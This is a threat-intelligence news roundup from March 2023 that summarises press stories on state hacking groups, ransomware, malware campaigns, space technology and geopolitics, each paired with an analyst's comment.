Friday, March 10, 2023 // (IG): BB // Cyber-Roundup// Coffee for Bob
China is developing a quantum communications satellite network
Analyst Comments: China's plan to develop a quantum communication network using LEO and MEO/GEO satellites is a significant development in the field of quantum communication. The Chinese have already demonstrated their prowess in the field with the Mozi mission, which made breakthroughs in quantum mechanics. The development of the quantum communication network is a strategic emerging industry in China, with the government aiming to achieve breakthroughs by 2030. The development of a global, all-day quantum communication network will have significant tactical and strategic implications for the Chinese military and the government. It will enable secure communication for critical infrastructure and government agencies, enhancing national security.
FROM THE MEDIA: Chinese research institutes are working on a quantum communication network using low Earth orbit (LEO) and medium-to-high Earth orbit (MEO/GEO) satellites. The network aims to provide encryption and secure transmission of information using quantum mechanics. Pan Jianwei, a scientist with the Chinese Academy of Sciences (CAS), revealed the plan at China’s annual political sessions in Beijing on 4 March 2023. The Chinese plan builds on breakthroughs made by the country's 2016 Quantum Science Satellite (Mozi/Micius) mission, which carried out experiments in quantum key distribution, quantum entanglement distribution, and quantum teleportation.
READ THE STORY: SN
New Image Is Our First Look at SpaceX's 'Mini' Starlink in Orbit
Analyst Comments: The accidental photograph of the Starlink V2 Mini satellite provides insight into the new look of the miniature satellites and the changes made to increase broadband capacity. SpaceX is hoping that the V2 Minis will temporarily fill the gap for the increasing demand on its Starlink network until the full-sized version of its next-generation satellites can be launched. The Starlink V2 Minis are part of SpaceX's broader plan to provide high-speed internet connectivity to remote and underserved areas around the world. The accidental photograph shows that the company is making progress in achieving its goals and improving its technology. The satellite imaging company HEO Robotics' ability to capture and identify satellites in orbit is also significant as it allows for better monitoring and tracking of space objects.
FROM THE MEDIA: A newly deployed Starlink V2 Mini satellite was accidentally photographed by a satellite imaging company. HEO Robotics, based in Australia, captured an image of the satellite in low Earth orbit, revealing the new look of the miniature satellites, which SpaceX is hoping will increase the broadband capacity of its internet constellation. The image shows the satellite has two solar panels, which is a noticeable difference from the first-generation Starlink satellites, which have only one.
READ THE STORY: Gizmodo
In-orbit visibility is more important than ever with the influx of Chinese balloons and UFOs
Analyst Comments: Ensuring a safe, sustainable space environment requires a better understanding of the nature of space traffic and the development of satellite autonomy. The lack of visibility puts the United States at risk of falling behind on the space insight curve, and the low public awareness of what’s at stake exacerbates the issue. The US must take urgent action to improve space domain awareness by deploying in-space camera sensors and in-space object tracking. The US must act urgently to improve space domain awareness, as a lack of visibility puts it at risk of falling behind on the space insight curve.
FROM THE MEDIA: The US is facing growing concerns over space domain awareness as China continues to launch satellites with no visibility of its environment. The US Government Accountability Office (GAO) predicts that 58,000 satellites will be launched by 2030, in addition to the 5,500 active satellites currently in orbit. Furthermore, some 20 percent of those space assets are expected to launch from China, a country that has made no secret of its space ambitions.
READ THE STORY: The Hill
Canadian military: Ransomware attack on contractor didn’t touch defense systems
Analyst Comments: The ransomware attack on Black & McDonald, a major engineering firm with contracts with the Canadian government and military, did not affect the Department of National Defence’s systems or files, nor its operations or security. This indicates that the Department of National Defence had sufficient security measures in place to prevent the attack from spreading to its systems. However, the attack on a key contractor for the Department of National Defence underscores the ongoing threat of ransomware attacks on critical infrastructure and highlights the need for continued vigilance and investment in cybersecurity measures to protect against such attacks.
FROM THE MEDIA: Canada’s defense department confirmed that its systems were not affected by a ransomware attack on Black & McDonald, a Canadian engineering firm that holds several contracts with the Department of National Defence. The spokesperson for the Department of National Defence said that Black & McDonald is the parent company of Canadian Base Operators and has contracts for facilities management and logistical support services. The spokesperson added that there is no evidence of any effects on DCC systems or files, nor on DND/CAF operations or security, as a result of the incident. Email communication later resumed between the Department of National Defence and the contractor once the company was able to restore its email system. Black & McDonald also has contracts with the Toronto Transit Commission and Ontario Power Generation. The engineering firm has 5,500 employees across 35 offices in North America and reported sales of $1.5 billion last year.
READ THE STORY: The Record
Nation-state hackers using malicious USB drives in attacks in Africa, Asia, and Oceania
Analyst Comments: The use of USB drives laden with PlugX malware by hackers targeting government organizations across multiple countries underscores the ongoing threat of advanced persistent threat (APT) groups using sophisticated techniques to steal sensitive information. The use of USB drives for malware distribution is not a new technique, but it has proven to be highly effective in this part of the world. This technique has been re-added by APT groups as an effective infection and exfiltration method. The use of the PlugX malware and USB delivery method, commonly used by the Chinese government, further underscores the ongoing threat of state-sponsored cyber espionage. Organizations should remain vigilant and implement security measures to protect against such attacks, including educating employees on the risks of using unknown USB drives and implementing policies to restrict the use of USB drives.
FROM THE MEDIA: Hackers are using USB drives laden with PlugX malware, typically used by the Chinese government, to target people in Mongolia, Papua New Guinea, Ghana, Zimbabwe, and Nigeria. The PlugX malware is a malicious tool developed in 2008 by Chinese government hackers commonly known as Mustang Panda. Sophos researchers found that government organizations across Southeast Asia were being targeted with USB drives in November 2022. By December 2022, the attack had spread to Africa. The malware and USB delivery method are partially meant to steal information from air-gapped networks. The researchers saw “localized outbreaks” of a new variant of PlugX being spread through the USB drives in Mongolia, Zimbabwe, and Nigeria. The PlugX malware copies everything in a victim’s recycle bin as well as anything on the device’s hard drive. Mustang Panda has previously been accused of targeting prime ministers and leaders across Southeast Asia and Indonesia’s intelligence agency, and even the Russian government.
READ THE STORY: The Record
Xenomorph Android Banking Trojan Returns with a New and More Powerful Variant
Analyst Comments: Xenomorph 3rd generation's emergence in the wild is a significant development in the realm of Android banking trojans. The malware's new features, such as its ability to automate the entire fraud chain, make it one of the most advanced and dangerous Android Malware trojans in circulation. Its ability to target more than 400 banking and financial institutions, including cryptocurrency wallets, poses a significant risk to financial systems worldwide. The malware's distribution via Discord's Content Delivery Network and its use of an APK binding service called Zombinder make it more difficult to detect and mitigate. The emergence of Xenomorph 3rd generation highlights the need for enhanced security measures to protect against banking trojans and the importance of ongoing efforts to combat their spread.
FROM THE MEDIA: A new variant of the Android banking trojan, named Xenomorph, has emerged in the wild. The updated version, known as Xenomorph 3rd generation, comes with new features that allow it to perform financial fraud in a seamless manner. Xenomorph first emerged in February 2022, targeting 56 European banks through dropper apps on the Google Play Store. The latest version, designed to target more than 400 banking and financial institutions, including cryptocurrency wallets, is being distributed via Discord's Content Delivery Network. The malware is delivered via trojanized versions of legitimate apps using an APK binding service called Zombinder. Xenomorph is known to abuse Accessibility Services to perform fraud through overlay attacks and also incorporates an Automated Transfer System module that allows it to extract authenticator codes. The malware also boasts cookie-stealing functions that enable the threat actors to perform account takeover attacks.
READ THE STORY: THN
Iranian Hackers Target Women Involved in Human Rights and Middle East Politics
Analyst Comments: The continued activities of Cobalt Illusion highlight the persistence of state-sponsored hacking groups and their tactics in targeting academics, activists, diplomats, journalists, politicians, and researchers. The group's use of fake personas and credential harvesting to gain access to sensitive data, particularly in the field of political affairs and human rights, is concerning. The bespoke tools that the group uses to steal data from popular email accounts pose a significant risk to privacy and security. The persistence of such groups in targeting individuals of strategic interest to governments highlights the importance of maintaining vigilance and implementing strong cybersecurity measures to protect against phishing attacks and data theft.
FROM THE MEDIA: Iranian state-sponsored hackers, known as Cobalt Illusion, are engaging in social engineering campaigns targeting women researchers involved in political affairs and human rights in the Middle East. They are using fake personas, including a fraudulent employee of a U.S. think tank, the Atlantic Council, to establish contact with individuals of strategic interest to the government. The group is suspected to be operating on behalf of Iran's Islamic Revolutionary Guard Corps and has used credential harvesting to gain control of victims' mailboxes, as well as bespoke tools like HYPERSCRAPE and a Telegram "grabber" tool, to steal data from Gmail, Yahoo!, and Microsoft Outlook accounts. Cobalt Illusion uses phishing and bulk data collection as core tactics and is likely to blend the intelligence gathered with other sources to inform military and security operations by Iran, foreign, and domestic.
READ THE STORY: THN
Russian hackers spreading anti-Western propaganda through video calls
Analyst Comments: The TA499 campaign is a significant tactical threat that aims to discredit those who have spoken out against Russia's invasion of Ukraine or have otherwise supported military actions against Russia. It is a prime example of the perpetuation of disinformation and the impact it can have on individuals and society as a whole. While the use of deep fake videos is a relatively new tactic in disinformation campaigns, it highlights the need for individuals to be vigilant and seek out reliable sources of information. In a broader strategic sense, disinformation campaigns like TA499 can undermine public trust in institutions and sow division, making them a threat to national security.
FROM THE MEDIA: A pro-Russia propaganda campaign targeting C-level executives and high-level officials has been uncovered by cybersecurity company Proofpoint. The threat actor behind the campaign, dubbed TA499 or Vovan, attempts to get high-profile individuals on a video or audio call by impersonating Ukrainian Prime Minister Denys Shmyhal and others. The hackers then use excessive makeup or artificial intelligence to create convincing deep fake videos of the impersonated individual to trick the target into making embarrassing comments or acts, which are then edited and placed on YouTube and Twitter. The campaign is a serious threat that has already tricked high-level officials and executives and could damage the brand and public perception of those targeted.
READ THE STORY: GVS
PyPI repo poisoned with “Colour-Blind” RAT
Analyst Comments: The discovery of Colour-Blind highlights the ongoing risks and challenges that organizations face in terms of software supply chain security. Organizations should be careful when using open-source software packages and conduct security assessments before testing. The increase in supply chain attacks is driven by the potentially high-value data at stake, such as secrets in the recent CircleCI hack, and the automation of attacks is even more concerning, as attackers can publish malware in an automated way.
FROM THE MEDIA: The rise of software supply chain risks is indicated by the ease with which hackers can write the basic functions of malware into modern languages like Python. Colour-Blind is a sign of the increased threat landscape that arises from the democratization of cybercrime, and multiple malware variants can be spawned from code sourced from others. Cybercriminals are using crime-as-a-service offerings on the dark web, simplifying the requirements to become a threat actor. Threat actors are always on the lookout for new attack vectors, vulnerabilities, and techniques to achieve their goals.
READ THE STORY: Security Boulevard
EU plans joint navy patrols to combat Russian threat to infrastructure
Analyst Comments: The Nord Stream pipeline attack highlighted the need for increased monitoring and protection of critical maritime infrastructure and ships from physical and cyber threats. The move also emphasizes the need for better coordination between member states and increased satellite monitoring and intelligence sharing. Floating gas storage and regasification units (FSRUs) are considered a possible target, which is vital to Europe's plans to end its dependency on Russian gas by tapping the global market for seaborne LNG imports. The task forces will clean up the Black Sea after the Ukraine war, where mines planted by both Ukraine and Russia have drifted toward EU member states. Mines and unexploded shells on the seabed from the two world wars also need to be mapped and removed for the renewable energy plans.
FROM THE MEDIA: The EU is planning joint maritime patrols and naval exercises to combat Russian spy ships and protect critical marine infrastructure. The updated maritime strategy, set to be published on Friday, includes an action plan for an annual joint EU naval exercise, increased military and coastguard patrols, and better coordination between member states. The strategy also advocates for increased satellite monitoring and intelligence sharing. The move comes as EU member states warn of mounting evidence of Russian activity around offshore wind farms, oil and gas drilling platforms, and telecommunications cables. The strategy warns that floating gas storage and regasification units (FSRUs) are possible targets, which are vital to Europe’s plans to end its dependency on Russian gas by tapping the global market for seaborne LNG imports. The terminals are considered vulnerable structures that Moscow could try to damage.
READ THE STORY: FT
IceFire Ransomware Exploits IBM Aspera Faspex to Attack Linux-Powered Enterprise Networks
Analyst Comments: IceFire ransomware group's shift to Linux systems represents a significant move, as Linux systems are generally considered more secure than Windows systems. However, the exploitation of a recently disclosed vulnerability in IBM Aspera Faspex file-sharing software has given the group an entry point. The attacks have primarily targeted media and entertainment organizations in countries that are not typically targeted by ransomware groups. Linux systems are less vulnerable to typical infection vectors like phishing or drive-by downloads, but the exploitation of application vulnerabilities can overcome this. As ransomware attacks continue to evolve and diversify, organizations need to keep their systems updated and regularly monitor for vulnerabilities.
FROM THE MEDIA: IceFire, a Windows-based ransomware, has started targeting Linux enterprise networks of media and entertainment sector organizations around the world. The attacks exploit a recently discovered deserialization vulnerability in IBM Aspera Faspex file-sharing software, and the ransomware is capable of avoiding encrypting certain paths to keep the infected machine operational. SentinelOne, a cybersecurity company, has observed a majority of attacks directed at companies located in Turkey, Iran, Pakistan, and the U.A.E. Linux systems are generally more difficult to deploy ransomware against than Windows, particularly at scale. Linux servers are less vulnerable to typical infection vectors like phishing or drive-by downloads, but ransomware actors can overcome this by exploiting application vulnerabilities. In another development, Fortinet FortiGuard Labs has disclosed a new LockBit ransomware campaign that employs evasive tradecraft to avoid detection. The campaign uses. IMG containers that bypass Mark-of-the-Web (MotW) protections.
READ THE STORY: THN
Hackers Exploiting Remote Desktop Software Flaws to Deploy PlugX Malware
Analyst Comments: The use of remote desktop software vulnerabilities to deploy malware like PlugX is a growing concern for organizations worldwide. The exploitation of such vulnerabilities has been proven to be effective in infecting victims and gaining control over their systems without their knowledge. The continued use of PlugX by Chinese threat actors with added features for system control and information theft shows the significance of this type of malware in cyber operations. The use of the DLL side-loading technique highlights the importance of protecting against DLL hijacking attacks. Organizations should prioritize securing their remote desktop software and implementing robust security measures to prevent the exploitation of vulnerabilities by threat actors.
FROM THE MEDIA: Security vulnerabilities in remote desktop programs such as Sunlogin and AweSun are being exploited by threat actors to deploy the PlugX malware. AhnLab Security Emergency Response Center (ASEC) reported that this is a continued abuse of flaws to deliver payloads on compromised systems. The PlugX malware is being used by Chinese threat actors, who add new features to help perform system control and information theft. Successful exploitation of the vulnerabilities allows the execution of a PowerShell command that retrieves an executable and a DLL file from a remote server. The DLL side-loading technique is then used to load the DLL file and ultimately run the PlugX payload in memory. The PlugX malware can start arbitrary services, download and execute files from an external source, and drop plugins that can harvest data and propagate using Remote Desktop Protocol (RDP).
READ THE STORY: THN
North Korean UNC2970 Hackers Expands Operations with New Malware Families
Analyst Comments: Reports surfacing about undocumented malware by UNC2970 highlights the continued development and deployment of new tools by North Korean cyber-espionage groups. UNC2970's targeting of security researchers suggests a shift in strategy or an expansion of its operations. The group's use of sophisticated obfuscation methods throughout the delivery and execution chain underscores the importance of implementing robust security measures to detect and prevent such attacks. Organizations should be wary of phishing attempts, particularly those involving fake LinkedIn accounts, and prioritize securing their systems against BYOVD techniques. UNC2970's continued cyber-espionage activities demonstrate the strategic significance of cyberspace in the global security landscape.
FROM THE MEDIA: A North Korean cyber-espionage group, UNC2970, has been observed using previously undocumented malware in a spear-phishing campaign targeting media and technology organizations in the US and Europe since June 2022. UNC2970, previously known as UNC577, shares "multiple overlaps" with a long-running operation known as "Dream Job," which uses job recruitment lures in email messages to trigger the infection sequence. UNC2970 uses fake LinkedIn accounts and conversations shifted to WhatsApp to deliver phishing payloads. The group also leverages Microsoft Intune to drop a bespoke PowerShell script containing a Base64-encoded payload. The group's new malware includes LIDSHIFT, LIDSHOT, TOUCHSHIFT, TOUCHSHOT, TOUCHKEY, HOOKSHOT, TOUCHMOVE, and SIDESHOW. UNC2970 uses the Bring Your Own Vulnerable Driver (BYOVD) technique, employing an in-memory-only dropper called LIGHTSHIFT to distribute another piece of malware, LIGHTSHOW, that disarms security software on the infected host.
READ THE STORY: THN
Sneaky malware BlackLotus can bypass important Windows boot functions
Analyst Comments: BlackLotus is a new and powerful bootkit malware that can bypass the UEFI Secure Boot feature in Microsoft Windows, allowing hackers to disable OS security mechanisms and install additional malware. This malware poses a serious threat to Windows users, as it is capable of disrupting networks and stealing sensitive data. The fact that BlackLotus can bypass a security feature that is supposed to protect Windows users highlights the need for continued vigilance and prompt patching of vulnerabilities. This incident also underscores the importance of using additional security measures, such as antivirus software and firewalls, to protect against malware attacks.
FROM THE MEDIA: Cybersecurity researchers are warning about a new malware called "BlackLotus" that is designed to bypass the UEFI Secure Boot feature in Microsoft Windows. BlackLotus exploits a Windows vulnerability that Microsoft patched a year ago, but researchers say the malware can still get around that update. Once BlackLotus has persistence in the boot process, it can disable OS security mechanisms, allowing hackers to install additional malware to surveil or disrupt a network. While an attacker would already need some sort of administrative access for BlackLotus to succeed on a patched computer, the malware's users probably have other goals. Researchers believe that not many threat actors have started using BlackLotus yet, as they have found only a low number of samples in public sources and their telemetry.
READ THE STORY: The Record
China-Russia cybersecurity ties taking darker turns. India needs to worry too
Analyst Comments: China's increasing dominance over Moscow's information control apparatus, which is the backbone of the Kremlin's statecraft, has significant implications for India and the world. While Russia's fall under China's control may have repercussions for a new world order, the deepening China-Russia alliance, despite unprecedented sanctions from the West, is a testament to the gravity of Beijing's dominance. As China continues to expand its digital authoritarianism, other countries may face challenges in maintaining secure communication and transactions with Russia, which could potentially lead to further security risks. China's contrasting approach to global hegemony, which relies on advanced technology and surveillance rather than military interventions, has already set it on a path to compete with the US for global dominance.
FROM THE MEDIA: The China-Russia alliance goes beyond just rerouted energy flows and infrastructural capabilities, as the Chinese Communist Party (CCP) has cemented its reach into Moscow's information control apparatus. Beijing's dominance over Moscow can be seen in its execution of surveillance, digital authoritarianism, and espionage through the most sophisticated system of surveillance, which is integral to the CCP's economic statecraft. This has significant implications for sensitive communication and transactions with Russia, raising concerns about Chinese spying. China's contrastingly successful and unethical use of technology is an essential part of its "no-limits" friendship with Russia, making it a significant threat to the existing world order. As Russia continues to face unprecedented sanctions from the West, it may fall deeper into China's hands, leading to a new world order with significant consequences.
READ THE STORY: The Print
With Russian Support, Nicaragua Smothers Dissent
Analyst Comments: The crackdown on Nicaraguan civil society poses a significant threat to democracy, the free press, and human rights. The decoupling of Nicaragua from the West, and the country's alignment with Russia and China, is a worrying development that may have implications for regional stability. The erosion of civil liberties, censorship of the press, and a crackdown on NGOs and political dissidents undermine democratic institutions and pose a risk to human rights. Furthermore, Russia's and China's increasing influence in Nicaragua may have implications for regional stability, especially if the country revives construction of the long-delayed Nicaraguan Canal across the Central American isthmus, a possible Panama Canal rival proposed by Ortega in 2013.
FROM THE MEDIA: The Nicaraguan government, led by President Daniel Ortega, has been cracking down on the political opposition, free press, and civil society by stripping 94 prominent Nicaraguans of their citizenship and expelling 222 political prisoners. The government has also shut down more than 3,100 non-government organizations (NGOs) involved in providing health, education, and community assistance, including those advocating for clean drinking water and women's rights. The country's civil society is being targeted through restrictions and surveillance of digital communications, with government-led efforts underway to curb access, limit content, and restrict the sharing of critical information. Nicaragua has a growing relationship with Russia, which has supplied the country with military equipment and satellite monitoring infrastructure, while China is also expanding its influence in the country, notably in digital surveillance. These developments have worried the United States that Russia and China, along with military operatives from Cuba, Bolivia, and Venezuela, are expanding their surveillance in the region.
READ THE STORY: FP
Chinese President Xi Jinping seals unprecedented third term
Analyst Comments: Xi's third term comes at a time of rising tensions with the West over issues such as Taiwan, the war in Ukraine, and espionage claims. The move to stack his inner circle with loyalists and strengthen the Communist Party's grip over state institutions is unprecedented in the reform era. As the parliament wraps up on Monday, a new premier and cabinet are set to be confirmed. The announcement of an economic growth target of "around 5%" for the year follows a 3% expansion in 2022, one of China's slowest growth rates since the 1970s, due to strict COVID-19 controls and the hit on the property market and exports.
FROM THE MEDIA: Chinese President Xi Jinping has been formally appointed for an unprecedented third term by thousands of delegates at the National People's Congress (NPC) in Beijing. All 2,952 delegates cast a ballot in favor of Xi's appointment as president and head of the military for another five years. The NPC had previously abolished term limits under Xi's watch, clearing the way for him to potentially rule for life and overtake China's founding fathers Mao and Deng Xiaoping, who was China's de facto ruler for two decades until his death in 1997.
READ THE STORY: Nikkei Asia
Pentagon aims to lure cyber talent through remote work and training
Analyst Comments: The Pentagon's cyber workforce strategy reflects the increasing importance of cybersecurity in national security and the government's ongoing struggle to attract and retain cyber talent. The federal government's cybersecurity workforce shortage has been a persistent problem, and the Pentagon's high vacancy rate underscores the urgency of finding solutions. The strategy's emphasis on creating a cyber-minded workplace culture, offering more flexibility, and identifying untapped sources of talent suggests a willingness to innovate and adapt to compete with Silicon Valley. However, the success of the strategy will depend on the effectiveness of its implementation, and its impact may take several years to become evident.
FROM THE MEDIA: The Department of Defense has released a new cyber workforce strategy aimed at competing with Silicon Valley for civilian cyber talent. The strategy includes plans for training programs, recruitment process changes, and apprenticeship programs to be implemented between 2023 and 2027. The federal government, including the Pentagon, has struggled to compete with private-sector cybersecurity roles that offer higher salaries and more workplace flexibility. The Pentagon's cyber workforce currently has a 25% vacancy rate across military and civilian roles. The new strategy focuses on identifying necessary skills, recruiting more talent, developing a cyber-minded workplace culture, and retaining existing talent. To achieve these goals, the Defense Department plans to create a new talent management system, assess the need for additional training and skillsets, and identify untapped sources of talent. The department also wants to establish a development fund for employee training and provide remote work flexibility for cyber workers. An apprenticeship program for workplace exchanges with the private sector is also planned. The Pentagon plans to release an implementation plan soon, but officials acknowledge that not all ideas will come to fruition.
READ THE STORY: AXIOS
Religious leaders experiment with ChatGPT sermons
Analyst Comments: ChatGPT may be able to help religious leaders save time on routine tasks, such as explaining particular holidays, and focus on more meaningful spiritual counseling. However, in a strategic sense, ChatGPT cannot replace the human warmth and empathy that is necessary for personal connection and spiritual guidance. While the use of AI in religion may trigger a resurgence in mystic religiosity, religious leaders should offer guidance and moral suasion to ensure that AI tools are imbued with ethics and morality.
FROM THE MEDIA: The article discusses how religious leaders are using AI tools, specifically ChatGPT, to help with sermon writing. ChatGPT has been able to pull together relevant thoughts from religious texts and eminent theologians, as well as stirring and poignant turns of phrase. However, religious leaders note that ChatGPT lacks the human warmth and empathy that congregants crave. While ChatGPT can alleviate some of the routine or repetitive tasks for religious leaders, it cannot replace the personal touch provided by spiritual counseling. Nevertheless, ChatGPT is forcing religious leaders to evolve and offer guidance and moral suasion to the tech industry.
READ THE STORY: AXIOS
Cranes, planes, and espionage: China and the US are right to be paranoid
Analyst Comments: The U.S. has ample funding to invest in new technologies and weapons, but it has chosen to prioritize misguided initiatives like maintaining a global military presence of 750 military bases and 170,000 troops stationed overseas, and a $2 trillion plan for building a new generation of nuclear weapons. Furthermore, many of the Pentagon's new favorites, from hypersonics to autonomous weapons to artificial intelligence, are unlikely to perform as advertised and could even make matters worse by increasing the risk of false alarms or inadvertent attacks on the wrong targets. Instead, the U.S. should prioritize diplomacy and dialogue with China to establish short-term guardrails and ongoing channels of communication to lower tensions and avoid conflict.
FROM THE MEDIA: U.S.-China relations have reached a dangerous level of tension, with Chinese President Xi Jinping stating that Western countries, led by the United States, have implemented containment, encirclement, and suppression of China. Meanwhile, the newly formed House Select Committee on the Strategic Competition Between the United States and the Chinese Communist Party has added fuel to the fire by raising concerns about alleged threats posed by Beijing, which, according to some, could lead to needless nuclear war.
READ THE STORY: Reaction
Serial hacker selling US House and Senate members' personal data
Analyst Comments: The data breach at DC Health Link highlights the growing threat of cyber attacks on healthcare and insurance companies, which hold a vast amount of sensitive personal information. The exposure of data belonging to US House and Senate members is particularly concerning, as it highlights the potential vulnerability of government officials and the importance of securing their personal data. The repeated appearance of the same threat actor in multiple data breaches highlights the need for increased cybersecurity measures and the need for companies to take proactive measures to safeguard their data.
FROM THE MEDIA: DC Health Link, a medical insurance company, experienced a security breach resulting in the exposure of 170,000 client records, including those of US House and Senate members. The stolen dataset, which included sensitive information, was listed for sale on a hacker forum by a threat actor known as "thekilob" or "IntelBroker". The data breach was confirmed by House Chief Administrative Officer Catherine Szpindor, who informed affected politicians via email and urged them to freeze their credit accounts to prevent identity theft. The breach's full extent remains unknown, but the FBI is assisting in compiling a list of affected individuals. The same threat actor has previously been linked to data breaches at Weee!, UScellular, and T-Mobile, with data from those breaches also posted on the same hacker forum.
READ THE STORY: Cybernews
Police seize Netwire RAT malware infrastructure, arrest admin
Analyst Comments: The arrest of the suspected administrator of the NetWire remote access trojan and the seizure of the service’s web domain and hosting server is a significant development in the fight against cybercrime. The removal of NetWire will impact the criminal cyber ecosystem and remove a popular tool used to hijack computers to perpetuate global fraud, data breaches, and network intrusions by threat groups and cyber criminals. The international law enforcement operation shows the effectiveness of global partnerships in combating cybercrime.
FROM THE MEDIA: On March 3rd, a coordinated international law enforcement operation involving the FBI, the United States Attorney's Office for the Central District of California, the Croatia Ministry of the Interior Criminal Police Directorate, Zurich Cantonal Police, Europol, and the Australian Federal Police resulted in the seizure of the NetWire remote access trojan's web domain and hosting server. NetWire was a remote access trojan promoted as a legitimate remote administration tool to manage a Windows computer remotely. However, since at least 2014, it has been used as a tool of choice in various malicious activities, including phishing attacks, BEC campaigns, and breaches of corporate networks. The FBI seized the worldwiredlabs.com domain used to promote the service, and police in Switzerland seized the server hosting the website. A Croatian national suspected to be the administrator of the NetWire website was also arrested on Tuesday in Croatia and will be prosecuted by local authorities.
READ THE STORY: BleepingComputer // The Register // TC
Items of interest
Russia avoiding direct military conflict with US, NATO forces?
Analyst Comments: The Annual Threat Assessment report highlights the high risk of military confrontation with the West posed by Russia's war of aggression against Ukraine. It also notes the potential for escalation in the conflict and the use of military, security, malign influence, cyber, and intelligence tools to advance Russian interests. The report's warning of Moscow's plans to strengthen ties with American media and politics for future influence operations is a significant concern. Russia's use of food and energy as foreign policy tools is also a cause for concern, exacerbating global food shortages and price increases. The report highlights the need for continued vigilance against Russian aggression and influence operations.
FROM THE MEDIA: The US intel community's Annual Threat Assessment report states that while Russia is unlikely to seek direct military conflict with the US and NATO, the potential for escalation in the conflict with Ukraine remains significant. Russia's war of aggression against Ukraine is reshaping its relationships with the West and China, with uncertain consequences. Russian military failures in the war could damage Putin's domestic standing, leading to further escalation in an attempt to regain public support. Russia will likely continue to use military, security, malign influence, cyber, and intelligence tools to advance its interests and undermine those of the US and its allies. The report notes that Moscow plans to "strengthen ties" with American media and politics for "future influence operations."
READ THE STORY: Eastern Eye
The SolarWinds Hack And The Future Of Cyber Espionage (Video)
FROM THE MEDIA: The SolarWinds hack is described as the largest cyber attack on the US government, with potentially thousands of targets affected. The attack was a supply chain attack, with hackers compromising SolarWinds to gain access to their customers' systems. The intrusion was discovered by cybersecurity company FireEye, which was also a victim of the attack. The attack appears to be a sophisticated form of intelligence collection rather than an attack. The US government has formidable attribution capabilities and can identify the responsible party. Deterrence is not effective against cyber intelligence activity, but raising the costs and making life harder for advanced adversaries can be effective.
USA vs China, The War You Can't See (Video)
FROM THE MEDIA: The US and China are engaged in a war over microchips, which are crucial for technology and military purposes. Microchips are being used as a currency of power, similar to how oil was in the past. The conflict involves government regulations and business rules to stop rivals from obtaining the most important technology in the world. The US has imposed restrictions on China's access to advanced computer chips, while giving billions of dollars to American chip makers to protect their chips. The conflict is playing out in government offices and company boardrooms and is becoming a part of how conflict works in the world today.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.